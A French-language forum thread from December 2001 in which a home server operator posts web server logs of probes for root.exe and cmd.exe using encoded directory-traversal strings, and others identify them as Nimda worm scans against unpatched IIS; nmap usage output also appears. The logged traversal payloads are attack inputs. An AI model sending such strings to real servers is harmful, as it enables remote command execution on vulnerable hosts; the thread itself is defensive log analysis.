Salut,
 
Mon PC se connectant au net tourne sous 2k Pro SP2, et WinRoute Pro partage la connexion.
J'ai installé pour tests aujourd'hui une E-Smith 5.0 (SME, distri linux serveur HTTP, etc..).
Sur WinRoute, je fais du Port Mapping. Les personnes se connectant au port 80 sur mon IP publique sont renvoyées sur mon serveur Web sur le LAN.
 
Personne ne connait mon IP à part un ami. Dans les logs, je le vois lui, et une autre IP, et à la place d'avoir le logs de chargements du site hebergé (quelques HTM et GIF...) j'ai ceci   :
 
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:04 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:05 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:05 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:06 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:06 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:07 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:07 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:08 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:08 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:08 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:09 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:09 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:10 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:10 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:11 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:11 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
 
 
Qui sait à quoi ça correspond ??? tentatives de hack ?  

[edtdd]--Message édité par Groody--[/edtdd]

Et biensur dans les HTTPS/ERROR_LOG de la SME :
 
[Sat Dec 22 23:31:04 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/root.exe
[Sat Dec 22 23:31:05 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/MSADC/root.exe
[Sat Dec 22 23:31:05 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/c/winnt/system32/cmd.exe
[Sat Dec 22 23:31:06 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/d/winnt/system32/cmd.exe
[Sat Dec 22 23:31:06 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:07 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:07 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:08 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/msadc/..%5c../..%
5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd
.exe
[Sat Dec 22 23:31:08 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..Á../winnt/system32/cmd.exe
[Sat Dec 22 23:31:09 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..À¯../winnt/system32/cmd.exe
[Sat Dec 22 23:31:09 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..Á?../winnt/system32/cmd.exe
[Sat Dec 22 23:31:11 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:11 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..%2f../winnt/system32/cmd.exe

On essaie juste de voir si ton serveur est pas mal configuré

Une nouvelle IP tente de se connecter :
 
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS  62.112.205.173 - - [22/Dec/2001:23:44:25 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
MonDNS  62.112.205.173 - - [22/Dec/2001:23:44:33 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS  62.112.205.173 - - [22/Dec/2001:23:44:38 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS  62.112.205.173 - - [22/Dec/2001:23:44:44 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS  62.112.205.173 - - [22/Dec/2001:23:44:50 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS  62.112.205.173 - - [22/Dec/2001:23:44:54 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"

 
 
une PING -a IP ne donne rien.
Le tracert :
 
 1    47 ms    47 ms    31 ms  192.168.254.254
  2    31 ms    47 ms    47 ms  blackd-th1-1-a0.routers.proxad.net [212.27.32.22
1]
  3    47 ms    47 ms    47 ms  blackd-cbv-2-a6.routers.proxad.net [213.228.3.22
]
  4    31 ms    47 ms    47 ms  195.219.53.97
  5    46 ms   250 ms    47 ms  if-2-0.core1.Paris2.Teleglobe.net [195.219.14.65
]
  6   109 ms   109 ms   110 ms  if-6-0.core1.Milan.teleglobe.net [195.219.15.134
]
  7    94 ms    93 ms    94 ms  if-10-0-0.bb1.Milan.Teleglobe.net [195.219.137.3
9]
  8    94 ms    94 ms    93 ms  ix-8-1-0.bb1.Milan.Teleglobe.net [195.219.98.138
]
  9   109 ms   110 ms   390 ms  pal5-mil6-racc3.seabone.net [195.22.192.206]
 10   110 ms   125 ms   125 ms  ibs-11adsl-it-pal5.seabone.net [195.22.196.174]
 
 11   110 ms   125 ms   109 ms  r-rm199-fa3.interbusiness.it [151.99.29.152]
 12   125 ms   157 ms   156 ms  r-rm98-fa4.interbusiness.it [151.99.29.217]
 13   110 ms   125 ms   125 ms  r-rm201-7.interbusiness.it [151.99.29.102]
 14     *        *        *     Délai d'attente de la demande dépassé.
 15   187 ms   203 ms   188 ms  62.211.205.173

Verdoux, nouvelle IP ...
 
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS  62.112.205.173 - - [22/Dec/2001:23:44:25 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:33 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:38 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:44 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:50 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:54 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"

 
Prq l'IP change ??? Il spoofe ?
 
Help

L'autre a une IP hongroise, avec aussi un FTP ouvert.

c zarbe ouais le typ viens de Hongrie c louche    
 
kaltan

Tu en penses quoi ? Simple scanne ?
Prq de plusieurs IP différents, avec les mêmes tentatives ?
 
Spoofing ?
 
Le mecs essaye de voir quoi ? Si il peut lancer des commandes si ct un NT ?

y a rien de louche, c des scripts qui essaient d'exploiter des failles de IIS en essayant serveur après serveur, ip après ip en essayant toutes les IPs d'un range ...
normal quoi...
nimda powa...

plus rien depuis 23h44

 
simple scanne je sais rien mais en tout cas il a l'air de s'atarder sur ta bécanne
 
kaltan

 
comment fais tu d'aprés une Ip pour savoir quels ports il a d'ouverts?
 
kaltan

T'as dû laisser traîner ton IP quelque part (edonkey par exemple ) et 2 gars ont cherché à voir si ils pouvaient pas creuser.

Je scanne les ports (avec nmap par exemple sous linux)

Verdoux a écrit a écrit : T'as dû laisser traîner ton IP quelque part (edonkey par exemple ) et 2 gars ont cherché à voir si ils pouvaient pas creuser.

 
 
Hum... , pour une fois qu'il tourne....
 
3 Ip différentes quand ¨même!!! Et ils ont tous tenté de faire la même chose, regardez les URLs qui demandaient...

Verdoux a écrit a écrit :   Je scanne les ports (avec nmap par exemple sous linux)

 
tu aurais un soft sous windows a me conseiller (simple si possible juste pour comprendre)
 
merci

un super outil, qui scanne, png, etc.. NetLab

Je connais pas trop les softs de scan.
Là j'ai utilisé simplement nmap, sans bidouiller les options. D'ailleurs je maîtrise pas grand chose dans ce domaine.

merci je vais essayer ce petit soft
 
kaltan

Kalt, malheureusement c sous Nux.. (si tu trouves une version Win..). Je crois que j'en avais trouvé une, mais.. je pouvais pas, je sais plus prq. Incompatible, ou ct les sources, ou une conneries comme ça.

Merde Kalt, j'avais oublié que je t'en avais conseillé un .
C'est NMAP qui est sous NUX.  
 
  le Groody ...

oui jai essayé netlab mais bon pour les ports c pas trés clair
j'utilise neotrace en principe c pas possible d'obtenir l'indication des ports ouverts?
 
kaltan

comme dis Martinez, c pas grave c'est juste le virus nimda
 
c'est auomatique, c'est comme ça qu'il se propage, ça tombe les gars sont même pas au courant qu'ils sont contaminés.
ils scannent des range d'ip... t'es dedans... pas de bol
 
maintenant ça se calme mais il y a qq semaines en restant connecter 30 minutes, je me tapais 4 ou 5 attaques d'ips différentes.   Comme je suis sous Linux, je m'en tape ça remplit juste mes logs (que j'ai séparé heureusement)
 
ps : scanner c'est interdit    

[edtdd]--Message édité par ethernal--[/edtdd]

Bah vla la soluce .
 
Donc, que tente de faire ce virus ?
 
Bah, pareil, je risque rien. le serveur Web est sous Nux.

Encore un, mais la ligne est toute seul dans les logs...
 
MonDNS 62.0.113.83 - - [23/Dec/2001:00:35:16 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"

[edtdd]--Message édité par Groody--[/edtdd]

finallement NMAP fonctionne sous 2K. Y'avais juste une DLL a déplacer
 
Now, ... Y'A plus qu'à comprendre comment ça fonctionne..    
 
 
P:\NMAP\Nmapnt>nmapnt
 
 
Starting nmapNT V. 2.53 SP1 by ryan@eEye.com
eEye Digital Security ( http://www.eEye.com )
based on nmap by fyodor@insecure.org  ( www.insecure.org/nmap/ )
 
nmap V. 2.53 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
  -sT TCP connect() port scan (default)
* -sS TCP SYN stealth port scan (best all-around TCP scan)
* -sU UDP port scan
  -sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
  -sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
  -p <range> ports to scan.  Example range: '1-1024,1080,6666,31337'
  -F Only scans ports listed in nmap-services
  -v Verbose. Its use is recommended.  Use twice for greater effect.
  -P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
  -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
  -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
  -oN/-oM <logfile> Output normal/machine parsable scan logs to <logfile>
  -iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
  --interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
 
WINDOWS Interface enumeration:
No Suitible Interfaces!

tu viens juste de te faire attaquer par nimda. Si t'es a jour dans tes patch, pas de problème.

Non, pas à jour. Le poste passerelle sur lequel je suis, W2k pro SP2 IE 5.5 SP2
 
c tout. Je vois pas ce que pourrai me faire Nimda. Le serveur est sous Nux.

Ca aussi c Nimda ??? (Encore une IP...)
 
MonDNS 62.147.9.164 - - [23/Dec/2001:00:53:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS 62.147.9.164 - - [23/Dec/2001:00:53:23 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"

toutes les IP qui tentent commencent par 62.. zarb, hazard ? Y'a une zone géographique dans laquelle on est plus vérolé qu'ailleurs ?

 
si ca continue avec tout une série de commande comme plus haut, oui, c'est toujours nimda. Il exécute toujours les même commandes en espérant tomber sur un server NT sans protection. Mais comme t'es sous nux, tu risque rien. Au mieux, si l'ip correspond a un serveur avec mail, préviens-les qu'ils sont verolés.

non, l'avant derniere tentative, une seule ligne, et là, que 2.
 
Avec des tentatives en moyennes toutes les 25 minutes on va dire, j'ai pas que ça a faire. C'est quand même allicinant...

merci en passant

[edtdd]--Message édité par Groody--[/edtdd]

une bride de réponse serait que l'utilsateur a coupé sa connexion en plein milieu d'attaque. Sinon, c'est juste un pauvre blaireau qui tente au hasard.